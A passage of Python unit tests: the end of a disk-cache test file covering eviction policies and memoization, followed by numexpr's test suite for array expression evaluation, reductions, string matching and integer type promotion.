assert cache1[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
shutil.rmtree(cache_dir2, ignore_errors=True)
def test_custom_eviction_policy(cache):
dc.EVICTION_POLICY['lru-gt-1s'] = {
'init': (
'CREATE INDEX IF NOT EXISTS Cache_access_time ON'
' Cache (access_time)'
),
'get': 'access_time = {now}',
'cull': (
'SELECT {fields} FROM Cache'
' WHERE access_time < ({now} - 1)'
' ORDER BY access_time LIMIT ?'
),
}
size_limit = int(1e5)
cache.reset('eviction_policy', 'lru-gt-1s')
cache.reset('size_limit', size_limit)
for count in range(100, 150):
cache[count] = str(count) * 500
size = cache.volume()
assert size > size_limit
assert cache.cull() == 0
assert size == cache.volume()
for count in range(100, 150):
assert cache[count] == str(count) * 500
time.sleep(1.1)
assert cache.cull() > 0
assert cache.volume() < size_limit
def test_lru_incr(cache):
cache.reset('eviction_policy', 'least-recently-used')
cache.incr(0)
cache.decr(0)
assert cache[0] == 0
def test_memoize(cache):
count = 1000
def fibiter(num):
alpha, beta = 0, 1
for _ in range(num):
alpha, beta = beta, alpha + beta
return alpha
@cache.memoize()
def fibrec(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
return fibrec(num - 1) + fibrec(num - 2)
cache.stats(enable=True)
for value in range(count):
assert fibrec(value) == fibiter(value)
hits1, misses1 = cache.stats()
for value in range(count):
assert fibrec(value) == fibiter(value)
hits2, misses2 = cache.stats()
assert hits2 == (hits1 + count)
assert misses2 == misses1
|
test_numexpr.py
|
###################################################################
# Numexpr - Fast numerical array expression evaluator for NumPy.
#
# License: MIT
# Author: See AUTHORS.txt
#
# See LICENSE.txt and LICENSES/*.txt for details about copyright and
# rights to use.
####################################################################
import os
import sys
import platform
import warnings
from contextlib import contextmanager
import subprocess
import numpy as np
from numpy import (
array, arange, empty, zeros, int32, int64, uint16, complex_, float64, rec,
copy, ones_like, where, alltrue, linspace,
sum, prod, sqrt, fmod, floor, ceil,
sin, cos, tan, arcsin, arccos, arctan, arctan2,
sinh, cosh, tanh, arcsinh, arccosh, arctanh,
log, log1p, log10, exp, expm1, conj)
from numpy.testing import (assert_equal, assert_array_equal,
assert_array_almost_equal, assert_allclose)
from numpy import shape, allclose, array_equal, ravel, isnan, isinf
import numexpr
from numexpr import E, NumExpr, evaluate, re_evaluate, disassemble, use_vml
import unittest
TestCase = unittest.TestCase
double = np.double
if sys.version_info[0] >= 3:
long = int
# Recommended minimum versions
from distutils.version import LooseVersion
minimum_numpy_version = LooseVersion('1.7.0')
present_numpy_version = LooseVersion(np.__version__)
class test_numexpr(TestCase):
"""Testing with 1 thread"""
nthreads = 1
def setUp(self):
numexpr.set_num_threads(self.nthreads)
def test_simple(self):
ex = 2.0 * E.a + 3.0 * E.b * E.c
sig = [('a', double), ('b', double), ('c', double)]
func = NumExpr(ex, signature=sig)
x = func(array([1., 2, 3]), array([4., 5, 6]), array([7., 8, 9]))
assert_array_equal(x, array([86., 124., 168.]))
def test_simple_expr_small_array(self):
func = NumExpr(E.a)
x = arange(100.0)
y = func(x)
assert_array_equal(x, y)
def test_simple_expr(self):
func = NumExpr(E.a)
x = arange(1e6)
y = func(x)
assert_array_equal(x, y)
def test_rational_expr(self):
func = NumExpr((E.a + 2.0 * E.b) / (1 + E.a + 4 * E.b * E.b))
a = arange(1e6)
b = arange(1e6) * 0.1
x = (a + 2 * b) / (1 + a + 4 * b * b)
y = func(a, b)
assert_array_almost_equal(x, y)
def test_reductions(self):
# Check that they compile OK.
assert_equal(disassemble(
NumExpr("sum(x**2+2, axis=None)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'sum_ddn', b'r0', b't3', None)])
assert_equal(disassemble(
NumExpr("sum(x**2+2, axis=1)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'sum_ddn', b'r0', b't3', 1)])
assert_equal(disassemble(
NumExpr("prod(x**2+2, axis=2)", [('x', double)])),
[(b'mul_ddd', b't3', b'r1[x]', b'r1[x]'),
(b'add_ddd', b't3', b't3', b'c2[2.0]'),
(b'prod_ddn', b'r0', b't3', 2)])
# Check that full reductions work.
x = zeros(100000) + .01 # checks issue #41
assert_allclose(evaluate("sum(x+2,axis=None)"), sum(x + 2, axis=None))
assert_allclose(evaluate("sum(x+2,axis=0)"), sum(x + 2, axis=0))
assert_allclose(evaluate("prod(x,axis=0)"), prod(x, axis=0))
assert_allclose(evaluate("min(x)"), np.min(x))
assert_allclose(evaluate("max(x,axis=0)"), np.max(x, axis=0))
# Fix for #277, array with leading singleton dimension
x = np.arange(10).reshape(1,10)
assert_allclose(evaluate("sum(x,axis=None)"), sum(x, axis=None) )
assert_allclose(evaluate("sum(x,axis=0)"), sum(x, axis=0) )
assert_allclose(evaluate("sum(x,axis=1)"), sum(x, axis=1) )
x = arange(10.0)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
assert_allclose(evaluate("min(x**2+2,axis=0)"), np.min(x ** 2 + 2, axis=0))
assert_allclose(evaluate("max(x**2+2,axis=0)"), np.max(x ** 2 + 2, axis=0))
x = arange(100.0)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
assert_allclose(evaluate("min(x-1,axis=0)"), np.min(x - 1, axis=0))
assert_allclose(evaluate("max(x-1,axis=0)"), np.max(x - 1, axis=0))
x = linspace(0.1, 1.0, 2000)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
assert_allclose(evaluate("min(x-1,axis=0)"), np.min(x - 1, axis=0))
assert_allclose(evaluate("max(x-1,axis=0)"), np.max(x - 1, axis=0))
# Check that reductions along an axis work
y = arange(9.0).reshape(3, 3)
assert_allclose(evaluate("sum(y**2, axis=1)"), sum(y ** 2, axis=1))
assert_allclose(evaluate("sum(y**2, axis=0)"), sum(y ** 2, axis=0))
assert_allclose(evaluate("sum(y**2, axis=None)"), sum(y ** 2, axis=None))
assert_allclose(evaluate("prod(y**2, axis=1)"), prod(y ** 2, axis=1))
assert_allclose(evaluate("prod(y**2, axis=0)"), prod(y ** 2, axis=0))
assert_allclose(evaluate("prod(y**2, axis=None)"), prod(y ** 2, axis=None))
assert_allclose(evaluate("min(y**2, axis=1)"), np.min(y ** 2, axis=1))
assert_allclose(evaluate("min(y**2, axis=0)"), np.min(y ** 2, axis=0))
assert_allclose(evaluate("min(y**2, axis=None)"), np.min(y ** 2, axis=None))
assert_allclose(evaluate("max(y**2, axis=1)"), np.max(y ** 2, axis=1))
assert_allclose(evaluate("max(y**2, axis=0)"), np.max(y ** 2, axis=0))
assert_allclose(evaluate("max(y**2, axis=None)"), np.max(y ** 2, axis=None))
# Check integers
x = arange(10.)
x = x.astype(int)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
assert_allclose(evaluate("min(x**2+2,axis=0)"), np.min(x ** 2 + 2, axis=0))
assert_allclose(evaluate("max(x**2+2,axis=0)"), np.max(x ** 2 + 2, axis=0))
# Check longs
x = x.astype(int)
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x**2+2,axis=0)"), prod(x ** 2 + 2, axis=0))
assert_allclose(evaluate("min(x**2+2,axis=0)"), np.min(x ** 2 + 2, axis=0))
assert_allclose(evaluate("max(x**2+2,axis=0)"), np.max(x ** 2 + 2, axis=0))
# Check complex
x = x + .1j
assert_allclose(evaluate("sum(x**2+2,axis=0)"), sum(x ** 2 + 2, axis=0))
assert_allclose(evaluate("prod(x-1,axis=0)"), prod(x - 1, axis=0))
def test_in_place(self):
x = arange(10000.).reshape(1000, 10)
evaluate("x + 3", out=x)
assert_equal(x, arange(10000.).reshape(1000, 10) + 3)
y = arange(10)
evaluate("(x - 3) * y + (x - 3)", out=x)
assert_equal(x, arange(10000.).reshape(1000, 10) * (arange(10) + 1))
def test_axis(self):
y = arange(9.0).reshape(3, 3)
try:
evaluate("sum(y, axis=2)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
try:
evaluate("sum(y, axis=-3)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
try:
# Negative axis are not supported
evaluate("sum(y, axis=-1)")
except ValueError:
pass
else:
raise ValueError("should raise exception!")
def test_r0_reuse(self):
assert_equal(disassemble(NumExpr("x * x + 2", [('x', double)])),
[(b'mul_ddd', b'r0', b'r1[x]', b'r1[x]'),
(b'add_ddd', b'r0', b'r0', b'c2[2.0]')])
def test_str_contains_basic0(self):
res = evaluate('contains(b"abc", b"ab")')
assert_equal(res, True)
def test_str_contains_basic1(self):
haystack = array([b'abc', b'def', b'xyz', b'x11', b'za'])
res = evaluate('contains(haystack, b"ab")')
assert_equal(res, [True, False, False, False, False])
def test_str_contains_basic2(self):
haystack = array([b'abc', b'def', b'xyz', b'x11', b'za'])
res = evaluate('contains(b"abcd", haystack)')
assert_equal(res, [True, False, False, False, False])
def test_str_contains_basic3(self):
haystacks = array(
[b'abckkk', b'adef', b'xyz', b'x11abcp', b'za', b'abc'])
needles = array(
[b'abc', b'def', b'aterr', b'oot', b'zu', b'ab'])
res = evaluate('contains(haystacks, needles)')
assert_equal(res, [True, True, False, False, False, True])
def test_str_contains_basic4(self):
needles = array(
[b'abc', b'def', b'aterr', b'oot', b'zu', b'ab c', b' abc',
b'abc '])
res = evaluate('contains(b"test abc here", needles)')
assert_equal(res, [True, False, False, False, False, False, True, True])
def test_str_contains_basic5(self):
needles = array(
[b'abc', b'ab c', b' abc', b' abc ', b'\tabc', b'c h'])
res = evaluate('contains(b"test abc here", needles)')
assert_equal(res, [True, False, True, True, False, True])
# Compare operation of Python 'in' operator with 'contains' using a
# product of two lists of strings.
def test_str_contains_listproduct(self):
from itertools import product
small = [
'It w', 'as th', 'e Whit', 'e Rab', 'bit,', ' tro', 'tting',
' sl', 'owly', ' back ', 'again,', ' and', ' lo', 'okin', 'g a',
'nxious', 'ly a', 'bou', 't a', 's it w', 'ent,', ' as i', 'f it',
' had l', 'ost', ' some', 'thi', 'ng; a', 'nd ', 'she ', 'heard ',
'it mut', 'terin', 'g to ', 'its', 'elf ', "'The",
' Duch', 'ess! T', 'he ', 'Duches', 's! Oh ', 'my dea', 'r paws',
'! Oh ', 'my f', 'ur ', 'and ', 'whiske', 'rs! ', 'She', "'ll g",
'et me', ' ex', 'ecu', 'ted, ', 'as su', 're a', 's f', 'errets',
' are f', 'errets', '! Wh', 'ere ', 'CAN', ' I hav', 'e d',
'roppe', 'd t', 'hem,', ' I wo', 'nder?', "' A", 'lice',
' gu', 'essed', ' in a', ' mom', 'ent ', 'tha', 't it w', 'as ',
'looki', 'ng f', 'or ', 'the fa', 'n and ', 'the', ' pai',
'r of w', 'hit', 'e kid', ' glo', 'ves', ', and ', 'she ',
'very g', 'ood', '-na', 'turedl', 'y be', 'gan h', 'unt', 'ing',
' about', ' for t', 'hem', ', but', ' they ', 'wer', 'e nowh',
'ere to', ' be', ' se', 'en--', 'ever', 'ythin', 'g seem', 'ed ',
'to ', 'have c', 'hang', 'ed ', 'since', ' he', 'r swim', ' in',
' the', ' pool,', ' and', ' the g', 'reat ', 'hal', 'l, w', 'ith',
' th', 'e gl', 'ass t', 'abl', 'e and ', 'the', ' li', 'ttle',
' doo', 'r, ha', 'd v', 'ani', 'shed c', 'omp', 'lete', 'ly.']
big = [
'It wa', 's the', ' W', 'hit', 'e ', 'Ra', 'bb', 'it, t', 'ro',
'tting s', 'lowly', ' back ', 'agai', 'n, and', ' l', 'ookin',
'g ', 'an', 'xiously', ' about ', 'as it w', 'ent, as', ' if ',
'it had', ' los', 't ', 'so', 'mething', '; and', ' she h',
'eard ', 'it ', 'mutteri', 'ng to', ' itself', " 'The ",
'Duchess', '! ', 'Th', 'e ', 'Duchess', '! Oh m', 'y de',
'ar paws', '! ', 'Oh my ', 'fu', 'r and w', 'hiskers', "! She'",
'll ', 'get', ' me ', 'execute', 'd,', ' a', 's ', 'su', 're as ',
'fe', 'rrets', ' are f', 'errets!', ' Wher', 'e CAN', ' I ha',
've dro', 'pped t', 'hem', ', I ', 'won', "der?' A",
'lice g', 'uess', 'ed ', 'in a m', 'omen', 't that', ' i',
't was l', 'ook', 'ing f', 'or th', 'e ', 'fan and', ' th', 'e p',
'air o', 'f whit', 'e ki', 'd glove', 's, and ', 'she v', 'ery ',
'good-na', 'tu', 'redl', 'y be', 'gan hun', 'ti', 'ng abou',
't for t', 'he', 'm, bu', 't t', 'hey ', 'were n', 'owhere',
' to b', 'e s', 'een-', '-eve', 'rythi', 'ng see', 'me', 'd ',
'to ha', 've', ' c', 'hanged', ' sinc', 'e her s', 'wim ',
'in the ', 'pool,', ' an', 'd the g', 'rea', 't h', 'all, wi',
'th the ', 'glas', 's t', 'able an', 'd th', 'e littl', 'e door,',
' had va', 'ni', 'shed co', 'mpletel', 'y.']
p = list(product(small, big))
python_in = [x[0] in x[1] for x in p]
a = [x[0].encode() for x in p]
b = [x[1].encode() for x in p]
res = [bool(x) for x in evaluate('contains(b, a)')]
assert_equal(res, python_in)
def test_str_contains_withemptystr1(self):
withemptystr = array([b'abc', b'def', b''])
res = evaluate('contains(b"abcd", withemptystr)')
assert_equal(res, [True, False, True])
def test_str_contains_withemptystr2(self):
withemptystr = array([b'abc', b'def', b''])
res = evaluate('contains(withemptystr, b"")')
assert_equal(res, [True, True, True])
def test_str_contains_long_needle(self):
a = b'1' + b'a' * 40
b = b'a' * 40
res = evaluate('contains(a, b)')
assert_equal(res, True)
def test_where_scalar_bool(self):
a = True
b = array([1, 2])
c = array([3, 4])
res = evaluate('where(a, b, c)')
assert_array_equal(res, b)
a = False
res = evaluate('where(a, b, c)')
assert_array_equal(res, c)
def test_refcount(self):
# Regression test for issue #310
a = array([1])
assert sys.getrefcount(a) == 2
evaluate('1')
assert sys.getrefcount(a) == 2
def test_locals_clears_globals(self):
# Check for issue #313, whereby clearing f_locals also clear f_globals
# if in the top-frame. This cannot be done inside `unittest` as it is always
# executing code in a child frame.
script = r';'.join([
r"import numexpr as ne",
r"a=10",
r"ne.evaluate('1')",
r"a += 1",
r"ne.evaluate('2', local_dict={})",
r"a += 1",
r"ne.evaluate('3', global_dict={})",
r"a += 1",
r"ne.evaluate('4', local_dict={}, global_dict={})",
r"a += 1",
])
# Raises CalledProcessError on a non-normal exit
check = subprocess.check_call([sys.executable, '-c', script])
# Ideally this test should also be done against ipython but it's not
# a requirement.
class test_numexpr2(test_numexpr):
"""Testing with 2 threads"""
nthreads = 2
class test_evaluate(TestCase):
def test_simple(self):
a = array([1., 2., 3.])
b = array([4., 5., 6.])
c = array([7., 8., 9.])
x = evaluate("2*a + 3*b*c")
assert_array_equal(x, array([86., 124., 168.]))
def test_simple_expr_small_array(self):
x = arange(100.0)
y = evaluate("x")
assert_array_equal(x, y)
def test_simple_expr(self):
x = arange(1e6)
y = evaluate("x")
assert_array_equal(x, y)
def test_re_evaluate(self):
a = array([1., 2., 3.])
b = array([4., 5., 6.])
c = array([7., 8., 9.])
x = evaluate("2*a + 3*b*c")
x = re_evaluate()
assert_array_equal(x, array([86., 124., 168.]))
def test_re_evaluate_dict(self):
a = array([1., 2., 3.])
b = array([4., 5., 6.])
c = array([7., 8., 9.])
x = evaluate("2*a + 3*b*c", local_dict={'a': a, 'b': b, 'c': c})
x = re_evaluate()
assert_array_equal(x, array([86., 124., 168.]))
# Test for issue #37
if sys.version_info[0] < 3:
# In python 3 '/' perforns true division, not integer division.
# Integer division '//' is still not suppoerted by numexpr
def test_zero_div(self):
x = arange(100, dtype='i4')
y = evaluate("1/x")
x2 = zeros(100, dtype='i4')
x2[1] = 1
assert_array_equal(x2, y)
# Test for issue #22
def test_true_div(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x/2"), x / 2)
assert_array_equal(evaluate("x/2", truediv=False), x / 2)
assert_array_equal(evaluate("x/2", truediv='auto'), x / 2)
assert_array_equal(evaluate("x/2", truediv=True), x / 2.0)
def test_left_shift(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x<<2"), x << 2)
def test_right_shift(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x>>2"), x >> 2)
# PyTables uses __nonzero__ among ExpressionNode objects internally
# so this should be commented out for the moment. See #24.
def test_boolean_operator(self):
x = arange(10, dtype='i4')
try:
evaluate("(x > 1) and (x < 9)")
except TypeError:
pass
else:
raise ValueError("should raise exception!")
def test_rational_expr(self):
a = arange(1e6)
b = arange(1e6) * 0.1
x = (a + 2 * b) / (1 + a + 4 * b * b)
y = evaluate("(a + 2*b) / (1 + a + 4*b*b)")
assert_array_almost_equal(x, y)
def test_complex_expr(self):
def complex(a, b):
c = zeros(a.shape, dtype=complex_)
c.real = a
c.imag = b
return c
a = arange(1e4)
b = arange(1e4) ** 1e-5
z = a + 1j * b
x = z.imag
x = sin(complex(a, b)).real + z.imag
y = evaluate("sin(complex(a, b)).real + z.imag")
assert_array_almost_equal(x, y)
def test_complex_strides(self):
a = arange(100).reshape(10, 10)[::2]
b = arange(50).reshape(5, 10)
assert_array_equal(evaluate("a+b"), a + b)
c = empty([10], dtype=[('c1', int32), ('c2', uint16)])
c['c1'] = arange(10)
c['c2'].fill(0xaaaa)
c1 = c['c1']
a0 = a[0]
assert_array_equal(evaluate("c1"), c1)
assert_array_equal(evaluate("a0+c1"), a0 + c1)
def test_recarray_strides(self):
a = arange(100)
b = arange(100,200)
recarr = np.rec.array(None, formats='f4,f4', shape=(100,))
recarr['f0'] = a
recarr['f1'] = b
c = recarr['f1']
assert_array_almost_equal(evaluate("sqrt(c) > 1."), sqrt(c) > 1.)
assert_array_almost_equal(evaluate("log10(c)"), log10(c))
def test_broadcasting(self):
a = arange(100).reshape(10, 10)[::2]
c = arange(10)
d = arange(5).reshape(5, 1)
assert_array_equal(evaluate("a+c"), a + c)
assert_array_equal(evaluate("a+d"), a + d)
expr = NumExpr("2.0*a+3.0*c", [('a', double), ('c', double)])
assert_array_equal(expr(a, c), 2.0 * a + 3.0 * c)
def test_all_scalar(self):
a = 3.
b = 4.
assert_allclose(evaluate("a+b"), a + b)
expr = NumExpr("2*a+3*b", [('a', double), ('b', double)])
assert_equal(expr(a, b), 2 * a + 3 * b)
def test_run(self):
a = arange(100).reshape(10, 10)[::2]
b = arange(10)
expr = NumExpr("2*a+3*b", [('a', double), ('b', double)])
assert_array_equal(expr(a, b), expr.run(a, b))
def test_illegal_value(self):
a = arange(3)
try:
evaluate("a < [0, 0, 0]")
except TypeError:
pass
else:
self.fail()
def test_ex_uses_vml(self):
vml_funcs = [ "sin", "cos", "tan", "arcsin", "arccos", "arctan",
"sinh", "cosh", "tanh", "arcsinh", "arccosh", "arctanh",
"log", "log1p","log10", "exp", "expm1", "abs", "conj",
"arctan2", "fmod"]
for func in vml_funcs:
strexpr = func+'(a)'
_, ex_uses_vml = numexpr.necompiler.getExprNames(strexpr, {})
assert_equal(ex_uses_vml, use_vml, strexpr)
if 'sparc' not in platform.machine():
# Execution order set here so as to not use too many threads
# during the rest of the execution. See #33 for details.
def test_changing_nthreads_00_inc(self):
a = linspace(-1, 1, 1000000)
b = ((.25 * a + .75) * a - 1.5) * a - 2
for nthreads in range(1, 7):
numexpr.set_num_threads(nthreads)
c = evaluate("((.25*a + .75)*a - 1.5)*a - 2")
assert_array_almost_equal(b, c)
def test_changing_nthreads_01_dec(self):
a = linspace(-1, 1, 1000000)
b = ((.25 * a + .75) * a - 1.5) * a - 2
for nthreads in range(6, 1, -1):
numexpr.set_num_threads(nthreads)
c = evaluate("((.25*a + .75)*a - 1.5)*a - 2")
assert_array_almost_equal(b, c)
tests = [
('MISC', ['b*c+d*e',
'2*a+3*b',
'-a',
'sinh(a)',
'2*a + (cos(3)+5)*sinh(cos(b))',
'2*a + arctan2(a, b)',
'arcsin(0.5)',
'where(a != 0.0, 2, a)',
'where(a > 10, b < a, b > a)',
'where((a-10).real != 0.0, a, 2)',
'0.25 * (a < 5) + 0.33 * (a >= 5)',
'cos(1+1)',
'1+1',
'1',
'cos(a2)',
])]
optests = []
for op in list('+-*/%') + ['**']:
optests.append("(a+1) %s (b+3)" % op)
optests.append("3 %s (b+3)" % op)
optests.append("(a+1) %s 4" % op)
optests.append("2 %s (b+3)" % op)
optests.append("(a+1) %s 2" % op)
optests.append("(a+1) %s -1" % op)
optests.append("(a+1) %s 0.5" % op)
# Check divisions and modulus by zero (see ticket #107)
optests.append("(a+1) %s 0" % op)
tests.append(('OPERATIONS', optests))
cmptests = []
for op in ['<', '<=', '==', '>=', '>', '!=']:
cmptests.append("a/2+5 %s b" % op)
cmptests.append("a/2+5 %s 7" % op)
cmptests.append("7 %s b" % op)
cmptests.append("7.0 %s 5" % op)
tests.append(('COMPARISONS', cmptests))
func1tests = []
for func in ['copy', 'ones_like', 'sqrt',
'sin', 'cos', 'tan', 'arcsin', 'arccos', 'arctan',
'sinh', 'cosh', 'tanh', 'arcsinh', 'arccosh', 'arctanh',
'log', 'log1p', 'log10', 'exp', 'expm1', 'abs', 'conj',
'ceil', 'floor']:
func1tests.append("a + %s(b+c)" % func)
tests.append(('1_ARG_FUNCS', func1tests))
func2tests = []
for func in ['arctan2', 'fmod']:
func2tests.append("a + %s(b+c, d+1)" % func)
func2tests.append("a + %s(b+c, 1)" % func)
func2tests.append("a + %s(1, d+1)" % func)
tests.append(('2_ARG_FUNCS', func2tests))
powtests = []
# n = -1, 0.5, 2, 4 already handled in section "OPERATIONS"
for n in (-7, -2.5, -1.5, -1.3, -.5, 0, 0.0, 1, 2.3, 2.5, 3):
powtests.append("(a+1)**%s" % n)
tests.append(('POW_TESTS', powtests))
def equal(a, b, exact):
if array_equal(a, b):
return True
if hasattr(a, 'dtype') and a.dtype in ['f4', 'f8']:
nnans = isnan(a).sum()
if nnans > 0:
# For results containing NaNs, just check that the number
# of NaNs is the same in both arrays. This check could be
# made more exhaustive, but checking element by element in
# python space is very expensive in general.
return nnans == isnan(b).sum()
ninfs = isinf(a).sum()
if ninfs > 0:
# Ditto for Inf's
return ninfs == isinf(b).sum()
if exact:
return (shape(a) == shape(b)) and alltrue(ravel(a) == ravel(b), axis=0)
else:
if hasattr(a, 'dtype') and a.dtype == 'f4':
atol = 1e-5 # Relax precission for special opcodes, like fmod
else:
atol = 1e-8
return (shape(a) == shape(b) and
allclose(ravel(a), ravel(b), atol=atol))
class Skip(Exception): pass
def test_expressions():
test_no = [0]
def make_test_method(a, a2, b, c, d, e, x, expr,
test_scalar, dtype, optimization, exact, section):
this_locals = locals()
def method():
try:
# We don't want to listen at RuntimeWarnings like
# "overflows" or "divide by zero" in plain eval().
warnings.simplefilter("ignore")
npval = eval(expr, globals(), this_locals)
warnings.simplefilter("always")
npval = eval(expr, globals(), this_locals)
except Exception as ex:
# just store the exception in a variable
# compatibility with numpy v1.12
# see also https://github.com/pydata/numexpr/issues/239
np_exception = ex
npval = None
else:
np_exception = None
try:
neval = evaluate(expr, local_dict=this_locals,
optimization=optimization)
except AssertionError:
raise
except NotImplementedError:
print('%r not implemented for %s (scalar=%d, opt=%s)'
% (expr, dtype.__name__, test_scalar, optimization))
except Exception as ne_exception:
same_exc_type = issubclass(type(ne_exception),
type(np_exception))
if np_exception is None or not same_exc_type:
print('numexpr error for expression %r' % (expr,))
raise
except:
print('numexpr error for expression %r' % (expr,))
raise
else:
msg = ('expected numexpr error not raised for expression '
'%r' % (expr,))
assert np_exception is None, msg
assert equal(npval, neval, exact), """%r
(test_scalar=%r, dtype=%r, optimization=%r, exact=%r,
npval=%r (%r - %r)\n neval=%r (%r - %r))""" % (expr, test_scalar, dtype.__name__,
optimization, exact,
npval, type(npval), shape(npval),
neval, type(neval), shape(neval))
method.description = ('test_expressions(%s, test_scalar=%r, '
'dtype=%r, optimization=%r, exact=%r)') % (expr, test_scalar, dtype.__name__, optimization, exact)
test_no[0] += 1
method.__name__ = 'test_scalar%d_%s_%s_%s_%04d' % (test_scalar,
dtype.__name__,
optimization.encode('ascii'),
section.encode('ascii'),
test_no[0])
return method
x = None
for test_scalar in (0, 1, 2):
for dtype in (int, int, np.float32, double, complex):
array_size = 100
a = arange(2 * array_size, dtype=dtype)[::2]
a2 = zeros([array_size, array_size], dtype=dtype)
b = arange(array_size, dtype=dtype) / array_size
c = arange(array_size, dtype=dtype)
d = arange(array_size, dtype=dtype)
e = arange(array_size, dtype=dtype)
if dtype == complex:
a = a.real
for x in [a2, b, c, d, e]:
x += 1j
x *= 1 + 1j
if test_scalar == 1:
a = a[array_size // 2]
if test_scalar == 2:
b = b[array_size // 2]
for optimization, exact in [
('none', False), ('moderate', False), ('aggressive', False)]:
for section_name, section_tests in tests:
for expr in section_tests:
if (dtype == complex and
('<' in expr or '>' in expr or '%' in expr
or "arctan2" in expr or "fmod" in expr
or "floor" in expr or "ceil" in expr)):
# skip complex comparisons or functions not
# defined in complex domain.
continue
if (dtype in (int, int) and test_scalar and
expr == '(a+1) ** -1'):
continue
m = make_test_method(a, a2, b, c, d, e, x,
expr, test_scalar, dtype,
optimization, exact,
section_name)
yield m
class test_int64(TestCase):
def test_neg(self):
a = array([2 ** 31 - 1, 2 ** 31, 2 ** 32, 2 ** 63 - 1], dtype=int64)
res = evaluate('-a')
assert_array_equal(res, [1 - 2 ** 31, -(2 ** 31), -(2 ** 32), 1 - 2 ** 63])
self.assertEqual(res.dtype.name, 'int64')
class test_int32_int64(TestCase):
if sys.version_info[0] < 2:
# no long literals in python 3
def test_small_long(self):
# Small longs should not be downgraded to ints.
res = evaluate('42L')
assert_array_equal(res, 42)
self.assertEqual(res.dtype.name, 'int64')
def test_small_int(self):
# Small ints (32-bit ones) should not be promoted to longs.
res = evaluate('2')
assert_array_equal(res, 2)
self.assertEqual(res.dtype.name, 'int32')
def test_big_int(self):
# Big ints should be promoted to longs.
res = evaluate('2**40')
assert_array_equal(res, 2 ** 40)
self.assertEqual(res.dtype.name, 'int64')
def test_long_constant_promotion(self):
int32array = arange(100, dtype='int32')
itwo = np.int32(2)
ltwo = np.int64(2)
res = int32array * 2
res32 = evaluate('int32array * itwo')
res64 = evaluate('int32array * ltwo')
assert_array_equal(res, res32)
assert_array_equal(res, res64)
self.assertEqual(res32.dtype.name, 'int32')
self.assertEqual(res64.dtype.name, 'int64')
def test_int64_array_promotion(self):
int32array = arange(100, dtype='int32')
int64array = arange(100, dtype='int64')
respy = int32array * int64array
resnx = evaluate('int32array * int64array')
assert_array_equal(respy, resnx)
self.assertEqual(resnx.dtype.name, 'int64')
class test_uint32_int64(TestCase):
def test_small_uint32(self):
# Small uint32 should not be downgraded to ints.
a = np.uint32(42)
res = evaluate('a')
assert_array_equal(res, 42)
self.assertEqual(res.dtype.name, 'int64')
def test_uint32_constant_promotion(self):
int32array = arange(100, dtype='int32')
stwo = np.int32(2)
utwo = np.uint32(2)
res = int32array * utwo
res32 = evaluate('int32array * stwo')
res64 = evaluate('int32array * utwo')
assert_array_equal(res, res32)
assert_array_equal(res, res64)
self.assertEqual(res32.dtype.name, 'int32')
self.assertEqual(res64.dtype.name, 'int64')
def test_int64_array_promotion(self):
uint32array = arange(100, dtype='uint32')
int64array = arange(100, dtype='int64')
respy = uint32array * int64array
resnx = evaluate('uint32array * int64array')
assert_array_equal(respy, resnx)
self.assertEqual(resnx.dtype.name, 'int64')
class test_strings(TestCase):
BLOCK_SIZE1 = 128
BLOCK_SIZE2 = 8
str_list1 = [b'foo', b'bar', b'', b' ']
str_list2 = [b'foo', b'', b'x', b' ']
str_nloops = len(str_list1) * (BLOCK_SIZE1 + BLOCK_SIZE2 + 1)
str_array1 = array(str_list1 * str_nloops)
str_array2 = array(str_list2 * str_nloops)
str_constant = b'doodoo'
def test_null_chars(self):
str_list = [
b'\0\0\0', b'\0\0foo\0', b'\0\0foo\0b', b'\0\0foo\0b\0',
b'foo\0', b'foo\0b', b'foo\0b\0', b'foo\0bar\0baz\0\0']
min_tobytes_version = LooseVersion('1.9.0')
for s in str_list:
r = evaluate('s')
if present_numpy_version >= min_tobytes_version:
self.assertEqual(s, r.tobytes()) # check *all* stored data
else:
# ndarray.tostring() is deprecated as of NumPy 1.19
self.assertEqual(s, r.tostring()) # check *all* stored data
def test_compare_copy(self):
sarr = self.str_array1
expr = 'sarr'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_array(self):
sarr1 = self.str_array1
sarr2 = self.str_array2
expr = 'sarr1 >= sarr2'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_variable(self):
sarr = self.str_array1
svar = self.str_constant
expr = 'sarr >= svar'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_constant(self):
sarr = self.str_array1
expr = 'sarr >= %r' % self.str_constant
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_add_string_array(self):
sarr1 = self.str_array1
sarr2 = self.str_array2
expr = 'sarr1 + sarr2'
self.assert_missing_op('add_sss', expr, locals())
def test_empty_string1(self):
a = np.array([b"", b"pepe"])
b = np.array([b"pepe2", b""])
res = evaluate("(a == b'') & (b == b'pepe2')")
assert_array_equal(res, np.array([True, False]))
